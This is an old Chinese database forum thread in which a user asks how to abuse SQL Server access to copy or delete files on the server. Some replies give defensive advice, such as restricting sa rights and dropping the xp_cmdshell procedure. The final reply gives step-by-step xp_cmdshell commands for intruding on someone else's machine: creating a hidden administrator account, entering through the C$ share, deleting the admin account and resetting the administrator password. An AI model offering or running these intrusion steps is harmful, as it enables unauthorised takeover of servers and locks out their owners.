怎么样利用sqlserver的漏洞?

smilegw 2003-12-09 11:12:11
不知道大家发现了没有,sqlserver装在服务器上,我们在客户端注册到服务器上,如果要用企业管理器备份服务器上的数据时,便会看到服务器上所有的盘符和所有的文件!!我们怎么能利用这个漏洞对服务器上的文件进行操作呢,比如说考拷贝,或删除呢?
...全文
40 7 打赏 收藏 举报
写回复
7 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
zjcxc 元老 2003-12-09
利用的话,就调用xp_cmdshell.但也要有管理员管理.
  • 打赏
  • 举报
回复
w_rose 2003-12-09
谁让你允许任何人都能够有sa/dbo身份的?

大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
  • 打赏
  • 举报
回复
w_rose 2003-12-09
谁允许你开发服务器上的磁盘目录访问权限的?
  • 打赏
  • 举报
回复
zjcxc 元老 2003-12-09
通过权限限制就行了.
  • 打赏
  • 举报
回复
lynx1111 2003-12-09
楼上说的只有SA级别权限的才能使用xp_cmdshell
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
  • 打赏
  • 举报
回复
Arionma 2003-12-09
这需要管理员权限。
  • 打赏
  • 举报
回复
txlicenhe 2003-12-09
http://expert.csdn.net/Expert/topic/2343/2343814.xml?temp=.7005121
本地装个sqlserver,用查询分析器登陆对方后:

exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'


若引起法律责任,概不负责。

  • 打赏
  • 举报
回复
发帖
MS-SQL Server

3.4w+

社区成员

MS-SQL Server相关内容讨论专区
社区管理员
  • 基础类社区
  • 二月十六
  • 卖水果的net
加入社区
帖子事件
创建了帖子
2003-12-09 11:12
社区公告
暂无公告